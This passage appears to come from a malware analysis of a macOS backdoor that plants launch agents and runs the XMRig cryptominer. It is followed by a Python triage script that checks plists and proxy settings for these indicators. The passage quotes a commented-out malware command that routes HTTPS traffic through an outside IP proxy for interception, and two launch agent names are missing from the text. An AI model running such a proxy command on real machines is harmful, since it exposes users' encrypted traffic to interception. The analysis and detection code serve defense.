A launch agent named was created to keep the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously. This script downloads and installs the other components of the malware. (The "com.apple" name is an immediate red flag that was the root cause of the discovery of this malware.)

The script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a launch agent named to keep the XMRig process running with that configuration active.

Interestingly, there's code in that script to download and install a root certificate associated with the mitmproxy software, software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted "https" traffic. However, that code was commented out, indicating it was not active:

```sh
# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080
```

On the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to slow down, thanks to a process that sucks up all the CPU/GPU. It's important to keep in mind, though, that the cryptominer was installed through a command issued by the backdoor, and there may very well have been other arbitrary commands sent to infected Macs by the backdoor in the past.
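The launch-agent and proxy indicators described above can be checked mechanically. The following is an added triage example, not code from the original post or from the malware itself: it inspects launch agent plists for an Apple-looking label sitting in a per-user LaunchAgents folder, for references to /Users/Shared or XMRig, and for an inline base64 Python payload, and it parses the output of `networksetup -getsecurewebproxy` to see whether an HTTPS proxy has been configured. The plist contents, file paths and labels (`com.apple.example`, `com.example.miner`, `com.example.updater`) are constructed samples; the proxy address is the one from the commented-out command above.

```python
import plistlib
import re

# Apple's own agents ship in /System/Library/LaunchAgents; a "com.apple.*"
# label in a per-user LaunchAgents folder is the red flag described above.
USER_AGENTS_RE = re.compile(r"^/Users/[^/]+/Library/LaunchAgents/")
# A long base64-looking token handed to "python -c ... exec(...)" is a cheap
# heuristic for an obfuscated one-liner like the one the backdoor agent runs.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{60,}")


def inspect_launch_agent(path, plist_bytes):
    """Return a list of findings (strings) for one launch agent plist."""
    findings = []
    p = plistlib.loads(plist_bytes)
    label = str(p.get("Label", ""))
    args = [str(a) for a in p.get("ProgramArguments", [])]
    if "Program" in p:
        args.insert(0, str(p["Program"]))
    cmd = " ".join(args)

    if label.startswith("com.apple.") and USER_AGENTS_RE.match(path):
        findings.append("apple-like label %r outside Apple-owned directory" % label)
    if "/Users/Shared/" in cmd:
        findings.append("runs or references a binary in world-writable /Users/Shared")
    if "xmrig" in cmd.lower():
        findings.append("references the XMRig miner")
    if "python" in cmd and ("-c" in args or "exec(" in cmd) and B64_BLOB_RE.search(cmd):
        findings.append("inline python with a base64-looking payload")
    # RunAtLoad/KeepAlive are normal on their own; report them only alongside
    # another finding, so a benign updater does not get flagged.
    if findings and (p.get("KeepAlive") or p.get("RunAtLoad")):
        findings.append("persistent (RunAtLoad/KeepAlive)")
    return findings


def parse_secure_web_proxy(output):
    """Parse `networksetup -getsecurewebproxy <service>` text into a dict."""
    fields = {}
    for line in output.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {
        "enabled": fields.get("Enabled", "No") == "Yes",
        "server": fields.get("Server", ""),
        "port": int(fields.get("Port", "0") or 0),
    }


def proxy_findings(output):
    proxy = parse_secure_web_proxy(output)
    if proxy["enabled"] and proxy["server"]:
        return ["HTTPS proxy enabled: %s:%d" % (proxy["server"], proxy["port"])]
    return []


def triage(agents, proxy_output):
    """agents: iterable of (path, plist_bytes). Returns a dict of suspicious
    agents keyed by path, plus a "proxy" entry when an HTTPS proxy is set."""
    report = {}
    for path, data in agents:
        found = inspect_launch_agent(path, data)
        if found:
            report[path] = found
    found = proxy_findings(proxy_output)
    if found:
        report["proxy"] = found
    return report


# Constructed samples (hypothetical labels and paths, not the real malware's).
BACKDOOR_AGENT = plistlib.dumps({
    "Label": "com.apple.example",
    "ProgramArguments": ["/usr/bin/python", "-c",
                         "import base64;exec(base64.b64decode('" + "aW1wb3J0IG9z" * 8 + "'))"],
    "RunAtLoad": True, "KeepAlive": True,
})
MINER_AGENT = plistlib.dumps({
    "Label": "com.example.miner",
    "ProgramArguments": ["/Users/Shared/xmrig", "-c", "/Users/Shared/config.json"],
    "KeepAlive": True,
})
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
    "RunAtLoad": True,
})
SAMPLE_AGENTS = [
    ("/Users/alice/Library/LaunchAgents/com.apple.example.plist", BACKDOOR_AGENT),
    ("/Users/alice/Library/LaunchAgents/com.example.miner.plist", MINER_AGENT),
    ("/Users/alice/Library/LaunchAgents/com.example.updater.plist", BENIGN_AGENT),
]
# Constructed to match the format networksetup prints, with the address above.
PROXY_OUTPUT = "Enabled: Yes\nServer: 46.226.108.171\nPort: 8080\nAuthenticated Proxy Enabled: 0\n"

if __name__ == "__main__":
    for key, found in triage(SAMPLE_AGENTS, PROXY_OUTPUT).items():
        print(key)
        for item in found:
            print("  -", item)
```

On a live Mac, feed `triage()` the real files (for example every `*.plist` under `~/Library/LaunchAgents` and `/Library/LaunchAgents`) and the text printed by `networksetup -getsecurewebproxy Wi-Fi`. The mitmproxy root certificate mentioned above, had it been installed, would show up in `security find-certificate -a -c mitmproxy /Library/Keychains/System.keychain`.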